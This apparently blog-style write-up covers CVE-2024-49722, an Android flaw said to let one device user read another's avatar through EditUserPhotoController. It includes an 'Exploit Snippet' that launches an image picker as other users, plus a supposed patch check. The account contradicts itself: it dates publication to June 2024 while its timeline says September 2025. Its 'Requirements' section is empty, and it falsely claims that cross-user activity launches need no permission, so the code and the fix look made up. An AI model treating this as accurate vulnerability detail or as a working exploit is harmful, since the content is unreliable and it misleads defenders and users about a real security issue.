CVE-2024-49722 - How a Confused Deputy in `EditUserPhotoController.java` Can Leak Avatars Across Android Users

In June 2024, a significant Android security vulnerability was identified and published as CVE-2024-49722. This local information disclosure flaw occurs when one Android user can access another user’s profile picture (avatar) without any extra privileges or user interaction. Let’s break down how this happens, see actual code, and show how this could be exploited.

What’s the Root Cause?

The bug lives in the showAvatarPicker method in the EditUserPhotoController.java file, part of the Android Open Source Project. Due to a classic confused deputy problem, an app on your device can trick this trusted system component into leaking image data between users. The "deputy," which is supposed to protect users’ privacy, ends up sharing someone’s profile photo with another user, all without user action or enhanced app permissions.

How Does It Work Technically?

Android supports multiple users on the same device (just like accounts on a PC). The profile image for each user is meant to be private. The vulnerability arises because the EditUserPhotoController does not properly check that an avatar it is handling actually belongs to the current user.

Here’s a simplified excerpt of the suspect method

// File: EditUserPhotoController.java (simplified)
public void showAvatarPicker(Activity context, UserHandle user) {
    // ... other code ...
    // Open Image Picker for the user
    Intent intent = new Intent(Intent.ACTION_PICK, MediaStore.Images.Media.EXTERNAL_CONTENT_URI);
    // Should be scoped to the current user, but isn't!
    context.startActivityAsUser(intent, user);
    // ... other code ...
}

The key flaw: startActivityAsUser(intent, user) can be called with any UserHandle. An app could supply a different user (not itself), and unless further checks are made, the system opens the avatar picker for the wrong user.

With the right call, an app can directly pick avatars from another user and read their image files — no root, no complex tricks, no user taps.

Exploit Scenario

Requirements:

Attack Steps

1. The malicious app constructs an Intent to launch the avatar picker, but passes the UserHandle of a different user.
2. The avatar picker surfaces the image belonging to the target user because the controller does not validate the calling user's authority.

Exploit Snippet

// Attack code on Android
UserManager um = (UserManager) context.getSystemService(Context.USER_SERVICE);
for (UserHandle uh : um.getUserHandles()) {
    if (!uh.equals(android.os.Process.myUserHandle())) {
        // Try to open avatar picker as another user
        Intent intent = new Intent(Intent.ACTION_PICK, MediaStore.Images.Media.EXTERNAL_CONTENT_URI);
        try {
            context.startActivityAsUser(intent, uh); // this leaks the avatar
        } catch (Exception e) {
            Log.w("Exploit", "Failed for user: " + uh, e);
        }
    }
}

*The key is the misuse of startActivityAsUser(). No additional permission is needed. The picker can return content URIs for other users.*

No User Interaction: No taps, clicks, or approvals — making it a silent leak.

- Data Impact: Profile images may reveal personal identities, help fingerprint users, or aid further attacks.

Responsible Disclosure & Patch

This flaw is tracked officially at:
- NVD Entry for CVE-2024-49722
- Android Security Bulletin (June 2024)
- Source Patch (Gerrit Link)

The Android Security Team patched this by enforcing checks that the caller’s UserHandle matches the current foreground user before opening content:

if (!user.equals(android.os.Process.myUserHandle())) {
    throw new SecurityException("Cannot act as another user!");
}

Summary Table

| Risk | Details |
|---------------|-----------------------------------------|
| Type | Information Disclosure (local) |
| Impact | Leaked user profile images |
| Privilege | None required (normal app) |
| Interaction | Not needed |
| Versions | Most Android versions before June 2024 |
| Patched? | Yes, June 2024 security update |

Update: Make sure your device is running the June 2024 Android security patch or later.

- Review Users: If you share your device, know that any user before patch may have had their profile photo exposed.
- App Install: Be careful about the apps you install, especially in shared (multi-user) device environments.

Extra References

- Read more about the confused deputy problem.
- Android multi-user documentation.
- Security Bulletin, June 2024.

Final Thoughts

CVE-2024-49722 is a good reminder: even simple oversight in privilege checks can open the door for leaks that affect everyone, without any “hacky” tricks. If you manage or build multi-user Android devices, check those permission boundaries carefully — and patch often.

Timeline

Published on: 09/02/2025 23:15:32 UTC
Last modified on: 09/04/2025 17:47:47 UTC